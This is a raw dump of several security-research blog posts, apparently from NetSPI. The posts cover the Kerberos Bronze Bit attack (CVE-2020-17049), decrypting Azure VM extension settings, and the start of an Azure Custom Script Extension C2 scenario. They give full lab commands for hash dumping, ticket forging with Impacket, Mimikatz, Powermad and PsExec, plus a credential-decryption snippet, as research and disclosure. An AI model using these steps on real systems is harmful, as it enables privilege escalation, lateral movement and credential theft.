The key takeaway for us is that the PAC now has an additional field which holds the "ticket signature." When the service ticket is produced during the S4U2self exchange, the KDC signs the ticket contents with its secret key and inserts the signature into the PAC. As discussed previously, the PAC itself is also doubly signed with the KDC’s secret key and the service’s key. Later, when the KDC receives the service ticket during the S4U2proxy exchange, the KDC can validate all three signatures to confirm that the PAC and the service ticket have not been modified. If the service ticket is modified (for example, if the forwardable bit has changed), the KDC will detect the change and reject the request with an error such as "KRB_AP_ERR_MODIFIED (Message stream modified)."

Final Thoughts

Thank you so much for joining me on this journey through Hades to get to know Kerberos. Armed with this background knowledge, I hope you continue on to my CVE-2020-17049: Kerberos Bronze Bit Attack - Practical Exploitation post. There I discuss how the attack is implemented and how it could be used. I hope to see you there!

[post_title] => CVE-2020-17049: Kerberos Bronze Bit Attack - Theory [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2020-17049-kerberos-bronze-bit-theory [to_ping] => [pinged] => [post_modified] => 2023-06-13 10:42:45 [post_modified_gmt] => 2023-06-13 15:42:45 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11799 [menu_order] => 443 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 11795 [post_author] => 52 [post_date] => 2020-12-08 07:00:20 [post_date_gmt] => 2020-12-08 07:00:20 [post_content] =>

With the release of Microsoft's patch to fix CVE-2020-17049, I’m excited to share details about this vulnerability and how it could be exploited. This post is only a very high-level overview, and I strongly encourage readers who are interested to check out my follow-up posts which provide much more depth:

From the attacker’s perspective, the exploit requires a few prerequisites:

  1. A foothold in the target environment to launch the attack.
  2. The password hash of a service account.
  3. That service account must be allowed to perform constrained delegation to another service.
    1. This could be classic constrained delegation (with either the “– Use Kerberos only” or the “- Use any authentication protocol” setting).
    2. This could also be resource-based constrained delegation.

With these prerequisites met, the attacker can authenticate to the second service as any user. This includes members of the Protected Users group and any other users explicitly configured as “sensitive and cannot be delegated.” The second service will accept and process the attacker’s requests as if they came from the impersonated user.

This attack uses the S4U2self and S4U2proxy protocols introduced by Microsoft as extensions to the Kerberos protocol used by Active Directory. The attack uses the S4U2self protocol to obtain a service ticket for a targeted user to the compromised service, using the service's password hash.

The attack then manipulates this service ticket by ensuring its forwardable flag is set (flipping the “Forwardable” bit to 1). The tampered service ticket is then used in the S4U2proxy protocol to obtain a service ticket for the targeted user to the targeted service. With this final service ticket in hand, the attacker can impersonate the targeted user, send requests to the targeted service, and the requests will be processed under the targeted user’s authority.

Exploit Overview Complete

This attack is made possible because the forwardable flag is only protected by encrypting the service ticket with the first service’s password hash. Having already obtained the hash, the attacker is free to decrypt the service ticket, flip the bit to set the forwardable flag, and then re-encrypt the ticket. Unlike the PAC, which was targeted in the MS14-068 attack, this portion of the ticket has no signature to detect tampering.

Bit Flip Animation Cropped

This exploit bypasses two existing protections for Kerberos delegation, and provides an opportunity for impersonation, lateral movement, and privilege escalation. Because this is accomplished by flipping a single bit, and in the spirit of the Golden Ticket and Silver Ticket attacks, I’ve dubbed this the Bronze Bit attack.

3rd Place Text

If you'd like to try the exploit in your own environment, it has been implemented as an addition to the Impacket framework with a pull request pending. Of course, this will have to be tested in a controlled environment with an unpatched domain controller. I recommend checking out the Practical Exploitation post for further details on how the exploit can be used.

Of course, any new research is built on the great work of many others. I’d like to thank the following individuals in particular for publishing their own research and for helping me with this finding:

[post_title] => CVE-2020-17049: Kerberos Bronze Bit Attack - Overview [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2020-17049-kerberos-bronze-bit-overview [to_ping] => [pinged] => [post_modified] => 2023-05-18 12:49:31 [post_modified_gmt] => 2023-05-18 17:49:31 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11795 [menu_order] => 442 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 11819 [post_author] => 52 [post_date] => 2020-12-08 07:00:09 [post_date_gmt] => 2020-12-08 07:00:09 [post_content] =>

This post reviews how the Kerberos Bronze Bit vulnerability (CVE-2020-17049) can be exploited in practice. I strongly suggest first reading the Bronze Bit Attack in Theory post to understand why and how this attacks works.

It is also worth noting that Microsoft published a patch for the vulnerability on November 10, 2020. The patch rollout will continue through February 9, 2021. The following attack scenarios assume the attacker is working in an environment where the Domain Controller does not have this patch applied.

The attacks enabled by the Bronze Bit vulnerability are an extension of other known attacks that arise from Kerberos Delegation. Elad Shamir and Will Schroeder have excellent articles explaining these scenarios and when they could be used. The Bronze Bit exploit bypasses two possible mitigations for the existing attack paths, increasing their effectiveness and versatility. An attacker can now perform the following:

  1. An attacker can impersonate users which are not allowed to be delegated. This includes members of the Protected Users group and any other users explicitly configured as “sensitive and cannot be delegated.”
  2. An attacker can launch the attack from a service which is not allowed to perform the authentication protocol transition. This means that if the service is configured without the “TrustedToAuthForDelegation” property (shown as “Trust this user for delegation to specified services only – Use Kerberos only” in the AD GUI), the attacker can use the exploit to obtain tickets as if the "TrustedToAuthForDelegation" property were set (shown as “Trust this user for delegation to specified services only – Use any authentication protocol” in the AD GUI).

Generic Attack Path

The general attack path for the exploit is the following:

  1. The attacker has a foothold in the AD environment.
  2. The attacker obtains the password hash for a service in the environment. We’ll refer to this service as “Service1.” There are many ways an attacker could obtain the necessary hash such as DC Sync attacks, Kerberoasting, or even creating a new machine account with SPN through Powermad.
  3. Service1 has a constrained delegation trust relationship to another service. We’ll refer to this as “Service2.” This trust relationship could be either of the following:
    1. Service1 is configured to perform constrained delegation to Service2. That is, Service2 is in Service1’s “AllowedToDelegateTo” list.
    2. Service2 is configured to accept resource-based constrained delegation from Service1. That is, Service1 is in Service2’s “PrincipalsAllowedToDelegateToAccount” list.
      1. If the attacker has write permissions (GenericAll, GenericWrite, WriteOwner, etc) for the Service2 object in AD, the attacker could add Service1 to Service2’s “PrincipalsAllowedToDelegateToAccount” list. This does not require domain admin privileges as described by Elad Shamir and Will Schroeder.
  4. The attacker uses the exploit to act as Service1 and obtain a Kerberos service ticket as a targeted user to Service2.
  5. The attacker impersonates the targeted user, presenting the service ticket to Service2. The attacker is now authenticated to Service2 as the targeted user, and can interact with Service2 under the targeted user’s authority.

Exploit Implementation

The Bronze Bit exploit has been developed as an extension of the Impacket framework from the good folks at SecureAuth. A pull request is currently pending to merge in the new exploit capabilities. There is a lot of great functionality available within Impacket, but we’re interested in the getST.py program. Let’s start by reviewing the program’s functionality without the exploit. We’ll jump into our attack path from above at Step #4. Let’s assume that we have obtained the hash for Service1, Service1 has a constrained delegation trust relationship to Service2, and we’re seeking to obtain access to Service2 as a target user.

The getST.py program can be used to execute the S4U exchanges and obtain a service ticket as a specified user to a specified service. If Service1 is allowed to perform the protocol transition (i.e. configured with “TrustedToAuthForDelegation”) and the user is not protected from delegation, the execution would look like the following:

Typical S4U Exchanges Complete

With the final service ticket, the attacker could impersonate the target user and interact with Service2 successfully. However, if Service1 is not allowed to perform protocol transition or the user is protected from delegation, the intermediate service ticket obtained in the S4U2self exchange will not be forwardable, and the S4U2proxy request will fail.

Rejected S4U Exchange Complete

-force-forwardable Flag

The Bronze Bit exploit has been implemented as an extension to the getST.py program. I’ve added a new -force-forwardable flag which can be passed as a command line argument. When the -force-forwardable flag is present, the exploit is executed after the S4U2self exchange. The service ticket returned by the KDC in the S4U2self exchange is decrypted with Service1’s long-term key, its forwardable flag set, and then re-encrypted. This altered ticket is attached in the S4U2proxy exchange and the KDC will return a service ticket for Service2 as the target user.

S4U With Exploit Complete

With the restrictions bypassed and service ticket in hand, the attacker is ready to impersonate the target user and interact with Service2 (Step #5 in the attack path).

Example Attack #1

Let’s see the attack in action.  In this scenario, we’ll see how the exploit allows us to bypass the “Trust this user for delegation to specified services only – Use Kerberos only” protection and impersonate a user who is protected from delegation. We’ll start with some initial environment setup.

Environment Configuration

Our test domain (test.local) has 3 servers running a version of Windows Server 2019 without the fix for the vulnerability. We’ll be launching our attack from our foothold as User1 on the Service1 server. We’ll be targeting User2, who has Administrative access to the Service2 server. And we’ll be interacting with the domain controller (DC) for all of our Kerberos tickets.

On the DC, configure Service1 such that it is allowed to perform constrained delegation without protocol transition to Service2. This ensures that the condition for Step #3 of the attack path is satisfied. If this configuration is set in the Active Directory GUI, it would look like the following:

Service1 Constrained Delegation To Service2

While still on the DC, also update the User2 account so that it is protected from delegation. The account could be configured with the “Account is sensitive and cannot be delegated” property. The account could also be made a member of the “Protected Users” group. Either or both of these configuration changes are equivalent for this demonstration:

  • Configuring User2 with the “Account is sensitive and cannot be delegated” property:
    User Account Is Sensitive
  • Adding User2 to the “Protected Users” group:
    User In Protected Users

Executing the attack

Exit the domain controller, and log into the Service1 server as User1. This simulates having gained a foothold in the environment (Step #1 in the Attack Path). Start up a PowerShell session and confirm that User1 and Service1 cannot currently access Service2 under their own authorization.

Commands:

  • whoami
  • ls \\service2.test.local\c$
  • .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe

Execution:

Powershell Access Denied

We’ve confirmed that User1 can’t directly access Service2. We continue on to Step #2 of the attack path: obtaining the hash for Service1. In this scenario, we’ll use Impacket’s secretsdump.py program to obtain the AES256-CTS-HMAC-SHA1-96 and LM:NTLM hashes for the Service1 machine account.

Command:

  • python .\impacket\examples\secretsdump.py 'test/user1:<user1_password>@Service1.test.local'

Execution:

Powershell Dump Hashes

After obtaining the necessary hashes, we’ll first attempt to execute the getST.py program without the -force-forwardable flag. This fails as expected. As discussed before, the S4U2self exchange still returns a service ticket to Service1 for User2, but that ticket’s Forwardable flag is not set because of the service’s delegation restrictions and the user’s protection from delegation. This causes an error when the ticket is used as evidence in the S4U2proxy exchange.

Command:

  • .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1

Execution:

Powershell S4U Fail

The moment we’ve all been waiting for: let’s run the exploit! This is Step #4 of our attack path. We’ll repeat the previous command, but this time including the -force-forwardable command line argument.

Command:

  • .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1 -force-forwardable

Execution:

Powershell S4U Exploit Success

Wow! Exciting stuff! Let’s focus on a couple of lines of output:

Service ticket from S4U2self flags: 00000000101000010000000000000000

Service ticket from S4U2self is not forwardable

Forcing the service ticket to be forwardable

Service ticket flags after modification: 01000000101000010000000000000000

Service ticket from S4U2self now is forwardable

With the inclusion of the -force-forwardable flag, the exploit is executed automatically and converts the service ticket received from the S4U2self exchange to a forwardable ticket. This is done by decrypting the ticket with Service1’s hash, changing the second bit in the flags value from 0 to 1, and re-encrypting the ticket. This forwardable ticket is sent in the S4U2proxy exchange, and a service ticket for Service2 as User2 is returned and written to disk at User2.ccache.

Next we’ll use Mimikatz to load the service ticket into our ticket cache for use. Once loaded, we’ll see that Mimikatz confirms that this is a valid ticket for User2 to the cifs service of Service2.

Command:

  • .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit
    .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit

Execution:

Powershell Mimikatz Load Ticket

With the service ticket added to our cache, we can now access Service2 as if we were User2. We have all of User2’s authority on Service2. We’ll use Mark Russinovich’s PSExec to obtain a PowerShell session on the Service2 server, and run some commands. This is our final Step #5 of the attack path.

Commands:

  • ls \\service2.test.local\c$
  • .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe
  • whoami
  • hostname

Execution:

Powershell Command Execution

And there we have it. We’ve flipped bits and abused Kerberos delegation to escalate our privileges and compromise another service by impersonating a protected user.

Example Attack #2

Let’s explore another attack path with different starting conditions. In this scenario, we’ll see how write permissions for the Service2 object in AD are all we need to successfully compromise Service2.

Environment Configuration

We’ll continue using the environment from the previous example, with a few modifications. The targeted User2 account can keep its configuration as a member of Protected Users or with the “Account is sensitive and cannot be delegated” property.

Begin by removing Service1’s delegation permission. Connect to the DC and configure Service1 with “Do not trust this computer for delegation.”

Service No Delegation

Edit the Service2 Computer object, granting User1 write permissions. While we’re granting permissions to our foothold user directly, users would typically obtain write permissions to one or more AD objects through membership in privileged groups. The user does not necessarily need to be a domain admin.

User Write Permission Service

Executing the attack

Exit the domain controller, and log into the Service1 server as User1. Like before, this simulates having gained a foothold in the environment (Step #1 in the Attack Path). If you’ve continued from the first example, please be sure to clear the local Kerberos ticket cache. The most effective method for clearing the cache is simply rebooting Service1.
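
If a full reboot isn’t convenient, the built-in klist utility can purge the ticket cache instead. Note that it only clears tickets for the logon session it runs in, which is why a reboot is the more thorough option:

klist purge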

Unlike our previous example, this attack will not leverage any delegation trust relationship between Service1 and Service2. This trust relationship no longer exists after configuring Service1 with “Do not trust this computer for delegation.”  We’ll need to establish a new delegation relationship to Service2, this time as a completely new service.

To create a new service in the environment, we’ll use Kevin Robertson’s Powermad to create a new machine account. This does not require elevated privileges and is available to any user in the domain by default. We’ll name the machine account “AttackerService” and provide an arbitrary password: “AttackerServicePassword”

Commands:

  • Import-Module .\Powermad\Powermad.ps1
  • New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force)

Execution:

Powershell Powermad

Since we chose the password for the new machine account, we can calculate the corresponding password hashes easily with Mimikatz. This will complete Step #2 of the attack path.

Commands:

  • .\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit
    .\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit

Execution:

Powershell Mimikatz Calc Hash

Let’s inspect our newly created machine account using the PowerShell Active Directory module. Since the module is not already available, we’ll install the corresponding feature, import the module, and then run our inspection.

Commands:

  • Install-WindowsFeature RSAT-AD-PowerShell
  • Import-Module ActiveDirectory
  • Get-ADComputer AttackerService

Execution:

Powershell Inspect Machine Account

After confirming our machine account’s existence, we can establish the constrained delegation trust relationship between Service2 and the AttackerService. Because User1 (our controlled foothold account) has write permissions for the Service2 object, we can add AttackerService to Service2’s PrincipalsAllowedToDelegateToAccount list. This establishes resource-based constrained delegation on Service2, accepting constrained delegation from AttackerService. Once this step is complete, we’ve satisfied the condition for Step #3 of the attack path.

Commands:

  • Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$
  • Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount

Execution:

Powershell Allow Rbac

We’re ready to continue onto Step #4 of the attack path and execute the exploit. We’ll use the same commands as in the previous example, but this time specifying AttackerService instead of Service1, and the hashes we calculated with Mimikatz. When we include the -force-forwardable flag in our command, we see the same results as we did in the previous example. The exploit is executed, the forwardable flag is set, and a service ticket to Service2 as User2 is written to disk at User2.ccache.

Commands:

  • python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardable

Execution:

Powershell S4U Success

Now we can simply repeat our final commands from the previous example. We’ll prepare for Step #5 of the attack path by loading the service ticket into our local Kerberos ticket cache using Mimikatz. Then we’ll execute Step #5 by interacting with Service2, impersonating User2.

Commands:

  • .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null
    .\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null
  • ls \\service2.test.local\c$
    ls \\service2.test.local\c$
  • .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe
    .\PSTools\PsExec64.exe \\service2.test.local\ powershell.exe
  • whoami
    whoami
  • hostname
    hostname

Execution:

Powershell Rce

And that’s all! With our starting foothold and write permissions for the Service2 AD object, we’ve compromised the service using the authority of a user who should have been protected from this type of delegation.

[post_title] => CVE-2020-17049: Kerberos Bronze Bit Attack - Practical Exploitation [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2020-17049-kerberos-bronze-bit-attack [to_ping] => [pinged] => [post_modified] => 2023-06-13 10:40:29 [post_modified_gmt] => 2023-06-13 15:40:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11819 [menu_order] => 445 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 11367 [post_author] => 52 [post_date] => 2020-03-30 07:00:07 [post_date_gmt] => 2020-03-30 07:00:07 [post_content] =>

TL;DR

If you're a local admin on an Azure VM, run the Get-AzureVMExtensionSettings script from MicroBurst to decrypt VM extension settings and potentially view sensitive parameters, storage account keys and local Administrator username and password.

Overview

The Azure infrastructure needs a mechanism to communicate with and control virtual machines. All Azure Marketplace images have the Azure Virtual Machine Agent (VM Agent) installed for this purpose. Azure pre-packages some executable tasks as VM Extensions. The VM Agent downloads the extensions from the Azure infrastructure, executes them, and sends back the results. The settings and configuration for each extension are saved to disk, and any potentially sensitive information within those settings is encrypted.

The newly added Get-AzureVMExtensionSettings PowerShell cmdlet in NetSPI’s MicroBurst repository attempts to decrypt and report all available configuration information saved from previously executed extensions on a VM. Depending on how VM extensions have been utilized on the VM, this configuration may contain sensitive command parameters, storage account keys, or even the Administrator username and password.

Background

The Azure Fabric Controller acts as the middleware between the actual data center hardware and the various Windows Azure services. It is responsible for data center resource allocation/provisioning and the health/lifecycle management of the services.

Within Azure VMs, the VM Agent “manages interactions between an Azure VM and the Azure Fabric Controller. The VM agent is responsible for many functional aspects of deploying and managing Azure VMs, including running VM extensions.” The extension packages are downloaded from the Fabric Controller “through the privileged channel on private IP 168.63.129.16.”

Extensions’ .settings Files

When the extension packages are downloaded, their necessary files are stored on the VM’s file system at:

C:\Packages\Plugins\<ExtensionName>\<ExtensionVersion>\

For example, the CustomScriptExtension’s files would be saved to:

C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.5\

This directory stores binaries, deployment scripts, status logs and more. Most importantly, it also stores the configuration information.

The exact information required is different for each extension, but this configuration is stored in the same format for all extensions. The configuration information is stored as a JSON object at the following path:

C:\Packages\Plugins\<ExtensionName>\<ExtensionVersion>\RuntimeSettings\<#>.settings

For example, the CustomScriptExtension would store its settings file at the following path:

C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.5\RuntimeSettings\0.settings

Analyzing Settings for Sensitive Information

Each extension’s .settings file has the following structure:

{
  "runtimeSettings": [
    {
      "handlerSettings": {
        "protectedSettingsCertThumbprint": "<Thumbprint of Certificate Used to Encrypt the ProtectedSettings>",
        "protectedSettings": "Base64-Encoded Encrypted Settings",
        "publicSettings": { <Plaintext JSON Object for non-sensitive settings > }
      }
    }
  ]
}

The settings are specific to each extension, but we are interested in viewing the contents of the “protectedSettings” where potentially sensitive information is stored.

The Get-AzureVMExtensionSettings cmdlet retrieves this information through the following steps:

  1. Find all .settings files on the VM for each extension.
  2. Apply the following steps to each settings file:
    1. If the .settings file has a valid “protectedSettingsCertThumbprint” value, find the corresponding certificate on the VM.
    2. If the certificate is found and its private key is accessible, decrypt the “protectedSettings” value.
    3. Output the decrypted “protectedSettings” value along with the rest of the information in the .settings file.

This allows us to easily review the plaintext values of the “protectedSettings” if the cmdlet can identify the corresponding certificate.
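
If you’d like to see the core of that logic in isolation, here’s a minimal standalone sketch. The extension path and version are just examples, and it assumes the encryption certificate and its private key are still present in an accessible certificate store (which is why local admin is required):

# Decrypt the "protectedSettings" value of a single .settings file
Add-Type -AssemblyName System.Security

$settingsFile = 'C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings'
$handler = (Get-Content $settingsFile -Raw | ConvertFrom-Json).runtimeSettings[0].handlerSettings

# The protectedSettings value is a Base64-encoded PKCS#7/CMS envelope
$cms = New-Object System.Security.Cryptography.Pkcs.EnvelopedCms
$cms.Decode([Convert]::FromBase64String($handler.protectedSettings))

# Decrypt() searches the accessible certificate stores for a matching private key
$cms.Decrypt()
[System.Text.Encoding]::UTF8.GetString($cms.ContentInfo.Content)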

Secondary Settings Location

The .settings files nested deeply within C:\Packages\Plugins\ are useful, but not always complete. For example, the VMAccess extension (which resets Administrator credentials on the VM) truncates its .settings file as part of its execution. Additionally, sometimes the “protectedSettingsCertThumbprint” value references a certificate which has already been rotated and is unavailable on the VM. In these instances, we can’t recover the sensitive configuration information in the “protectedSettings” value.

However, there is a workaround! It was discovered that the JSON contents of these .settings files are also copied into an XML file within a ZIP file at the following path:

C:\WindowsAzure\CollectGuestLogsTemp\<GUID>.zip\Config\WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml

The contents of this XML file are kept up to date with the current encryption certificate, being re-encrypted as necessary. This means that the certificate should always be available on the VM and ready to decrypt the “protectedSettings” value. Additionally, the settings in the XML file are not redacted. This means that we can decrypt the settings of the VMAccess extension which include the Administrator username and password. The only downside of this XML file is that it appears to only contain information about the latest execution of each extension. This is fine for the VMAccess extension (since we’re most interested in the latest username and password) but less helpful for the RunCommand extension (where we may want to see past executions as well).
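
Pulling that XML out for inspection is straightforward. A sketch, with the GUID-based names left as wildcards since they vary per VM:

# Extract the guest log bundle(s) and locate the extension config XML
Get-ChildItem 'C:\WindowsAzure\CollectGuestLogsTemp' -Filter *.zip |
    ForEach-Object { Expand-Archive $_.FullName -DestinationPath 'C:\tmp\guestlogs' -Force }
Get-ChildItem 'C:\tmp\guestlogs\Config' -Filter 'WireServerRoleExtensionsConfig_*.xml'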

Attack Scenario Setup

Let’s demonstrate the cmdlet’s usage by first acting as an Azure admin who creates the vulnerable environment by performing some actions on a VM through extensions (running a command and resetting the Administrator credentials), and then acting as an attacker using Get-AzureVMExtensionSettings to retrieve the sensitive information.

Executing scripts through the RunCommand extension

Let’s pretend we’re an Azure Administrator tasked with joining a VM to a domain using existing Administrator credentials. There are several ways to accomplish this, but a tantalizingly easy approach would be to perform this through a PowerShell script using the RunCommand feature. Although it’s against best practices, the Administrator credentials could be passed as parameters to the script. We may believe we’re protected because the script parameters are encrypted and stored in “protectedSettings.”

Using the Azure Cloud Shell, that command could look like the following:

PS Azure:\> az vm run-command invoke --command-id RunPowerShellScript --name <VMName> -g <ResourceGroup> --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"

Once the command is issued, the VM Agent on the target VM would pull the RunCommand extension from the Azure Fabric Controller. It would create a .settings file in a path like the following:

C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings

The settings are also copied into the WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml file in the ZIP file described earlier. The specified PowerShell script would be executed by the VM agent and the VM would join the domain.

Resetting Administrator Credentials through the VMAccess extension

Let’s pretend that we also need to reset the Administrator credentials for the VM. This can be done graphically through the Portal or through PowerShell. In either case, this functionality utilizes the VMAccess extension to accomplish the task on the VM. As the admin running the command, we simply provide a new username and password for the VM Administrator account. The VMAccess extension will update the Administrator credentials on the VM and create an empty .settings file in a path like the following:

C:\Packages\Plugins\Microsoft.Compute.VMAccessAgent\2.4.5\RuntimeSettings\0.settings

This empty file wouldn’t be useful for an attacker, but the non-redacted settings are copied into the WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml file.

Running Get-AzureVMExtensionSettings as an attacker

Now let’s switch roles to the attacker. We’ll assume that we’ve obtained Administrator access to the VM (perhaps through having the Contributor role or compromising a privileged service) and that we can run PowerShell commands. To use the Get-AzureVMExtensionSettings cmdlet, we’ll first download and extract the latest copy of the MicroBurst repo.

PS C:\> Invoke-WebRequest https://github.com/NetSPI/MicroBurst/archive/master.zip -OutFile C:\tmp\mb.zip
PS C:\> Expand-Archive C:\tmp\mb.zip -DestinationPath C:\tmp\

If we want the full MicroBurst functionality, we could import the top-level MicroBurst.psm1 module. In our case, we’ll only need to run the individual script so we’ll import it directly. Let’s import it, run it, and investigate the results.

PS C:\> Import-Module C:\tmp\MicroBurst-master\Misc\Get-AzureVMExtensionSettings.ps1
PS C:\> Get-AzureVMExtensionSettings

FullFileName : C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings
ProtectedSettingsCertThumbprint : CFE7419...
ProtectedSettings : MIICUgYJKoZIhvc...
ProtectedSettingsDecrypted : {"parameters":[{"name":"user","value":"admin"},{"name":"password","value":"secret-password"}]}
PublicSettings : {"script": …}
…
FileName : C:\WindowsAzure\CollectGuestLogsTemp\491f155a-5a14-4fb2-8aad-08598b61f6c9.zip\Config\
           WireServerRoleExtensionsConfig_b4817d34-70d7-4e8f-bee6-6b8eea40aef7._MGITest.xml
ExtensionName : Microsoft.Compute.VMAccessAgent
ProtectedSettingsCertThumbprint : F67D19B6F4C1E1C1947AF9B4B08AFC9EAED9CBB2
ProtectedSettings : MIIB0AYJK…
ProtectedSettingsDecrypted : {"Password":"MySecretPassword!"}
PublicSettings : {"UserName":"MyAdministrator"}

In the above output, we can see that Get-AzureVMExtensionSettings cmdlet returned decrypted parameters from the RunCommand extension’s 0.settings file and Administrator credentials from the VMAccess extension’s settings stored in the XML file within a ZIP.

With this information, we may be able to pivot further into the domain or Azure environment, spreading to other VMs, Storage Accounts, and more.

The cmdlet will return all available settings information from previously applied VM extensions, even if the script is unable to properly decrypt the protectedSettings field.

The cmdlet can also produce CSV results by piping the results into the standard Export-CSV cmdlet like so: Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv. The output results.csv will have one row for each extension processed.

Previous Research

In 2018, Guardicore published a blog and corresponding tool using this technique. Their exploit targeted a specific version of the VMAccess extension, which can be used to reset Administrator credentials on a VM. As mentioned previously, recent updates to the VMAccess extension have mitigated this by clearing the contents of that .settings file after the extension has completed its task. The Get-AzureVMExtensionSettings cmdlet provides a much broader scope by analyzing all extensions and including the secondary settings location, which circumvents Microsoft’s mitigations.

Responsible Disclosure

The issues discussed in this post were reported to the Microsoft Security Response Center (MSRC) on January 22, 2020, including steps and sample code to reproduce. The case numbers were VULN-015273 and VULN-015274. After understanding that the exploit requires Administrator privileges on the VM, the cases were closed with the following comment:

Our team investigated the issue, and this does not meet the bar for servicing by MSRC, since this requires elevated privileges.
We have informed the team about this, but will not be tracking this. As such, we are closing this case.

 

Acknowledgements

A big thanks to Karl Fosaaen for the suggestion to dive into this functionality and support through the MSRC process.

[post_title] => Decrypting Azure VM Extension Settings with Get-AzureVMExtensionSettings [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => decrypting-azure-vm-extension-settings-with-get-azurevmextensionsettings [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:25 [post_modified_gmt] => 2021-04-13 00:05:25 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11367 [menu_order] => 516 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 11255 [post_author] => 52 [post_date] => 2020-02-13 07:00:22 [post_date_gmt] => 2020-02-13 07:00:22 [post_content] => PowerShell and Bash scripts are excellent tools for automating simple or repetitive tasks. Azure values this and provides several mechanisms for remotely running scripts and commands in virtual machines (VMs). While there are many practical, safe uses of these Azure features, they can also be used maliciously. In this post we’ll explore how the Custom Script Extension and Run Command functionality could be leveraged by an attacker to establish a foothold in an environment, which could be used to persist access and escalate privileges.

Background

Before we dive into how an attacker would make use of the Custom Script Extension and Run Command features, let’s first understand what they are and their intended uses.

Custom Script Extension

Azure provides a large selection of virtual machine (VM) extensions which perform post-deployment automation tasks on Azure VMs. Typical tasks performed by VM extensions include anti-virus deployment, VM configuration, and application deployment/monitoring. The Custom Script Extension is particularly interesting as it downloads a script from a user-specified location (e.g. URL, blob storage, etc.) and then executes the script on a running Azure Windows or Linux VM. The typical usage of Custom Script Extensions is for one-time setup tasks, like installing an IIS Server, but since it runs an arbitrary script, it could perform just about anything.

Run Command

The Run Command feature connects to the Virtual Machine Agent to run commands and scripts. The scripts can be provided through the Azure Portal, REST API, Azure CLI, or PowerShell. An advantage of the Run Command feature is that commands can be executed even when the VM is otherwise unreachable (e.g. if the RDP or SSH ports are closed). This makes the Run Command feature particularly useful for diagnosing VM and network issues.

Key Similarities

While there are differences between the two features, there are some key similarities that make them particularly useful to attackers and penetration testers:
  1. Both features are available to a user with the Virtual Machine Contributor role.
  2. Both features run user-supplied commands in any VM that the user can access.
  3. Both features run the commands as the LocalSystem account on the VM.

Scenario

Now that we understand some of the features available to us, let’s explore how an attacker could utilize these features for their own purposes. We’ll play the role of a penetration tester who has compromised (or been provided with) an account which has the VM Contributor role in Azure. This role would allow us to "manage virtual machines, but not access to them, and not the virtual network or storage account they're connected to" (link). Our goal is to maintain access to the environment and escalate our privileges.

Attack Overview

At a high-level, here are the steps our proof-of-concept attack will take:
  1. We’ll set up a Covenant command and control (C2) server outside of the target Azure environment. This server will host a PowerShell script (the "Launcher") which when executed in a VM will run the Covenant implant (the “Grunt”).
  2. Through the Azure Portal, we’ll identify our target virtual machine(s) and add a Custom Script Extension. This Custom Script Extension will download our Powershell Launcher and start the Grunt. This will connect back to the C2 server, and allow us to run commands as LocalSystem on the VM.
  3. Once we’ve established access, we’ll exit out and cover our tracks by removing the extension.
  4. For demonstration purposes, we’ll also repeat this process using the Run Command feature by sending a PowerShell command which will execute our Launcher and run another Grunt.
While this proof-of-concept attack focuses on Windows VMs and tooling, the same concepts and features are equally applicable to Azure Linux VMs.

1: Covenant Command and Control Server Setup

Let’s start by setting up Covenant. Covenant is an advanced .NET command and control framework. We’ll be installing Covenant on a server we control, outside of the Azure environment that we’re attacking. In this proof of concept, we’ll be using c2.netspi.invalid as our C2 server. This is not a real DNS name, but it illustrates the concept. I’ll skip past installation and startup because solid guides are available on the Covenant Wiki.

